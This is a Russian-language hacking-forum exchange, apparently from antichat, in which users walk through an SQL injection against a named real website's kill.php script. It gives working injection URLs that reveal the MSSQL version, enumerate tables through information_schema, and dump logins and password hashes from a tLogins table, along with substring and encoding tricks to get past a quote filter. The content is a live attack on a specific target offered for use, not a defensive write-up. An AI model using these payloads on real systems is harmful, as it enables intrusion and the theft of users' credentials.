Сообщение от
imajo.ati
кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена
imajo.ati
Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо
P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+table_name+from+information_schema.tables)--
Получаем имя первой таблицы, через not+in+() получаем имена остальных таблиц, но так как стоит фильтр, то имена нужно кодировать, очень помог в этом
Universal char SQL encoder by [53x]Shadow!
Таким образом находим таблицу tLogins, колонки стандартные - login, password, id.
Выводим результат:
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(password+as+nvarchar)+from+tLogins)--
Логин и пароль сливаются, мускул ругается на +, ну впринцыпе и так покатит
Так как все символы хэша не выводятся, сначала выводим первые 30, а потом с помощью команды substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length, выводим недостающие 2 символа:
Код:
http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login+as+nvarchar)%2Bcast(substring(password,2,2)+as+nvarchar)+from+tLogins)--
Перебирать логины через where+id=... у меня не получилось, опять ругается мускул, альтернатива: +where+login+not+in(), логины опять же кодируем.
The End.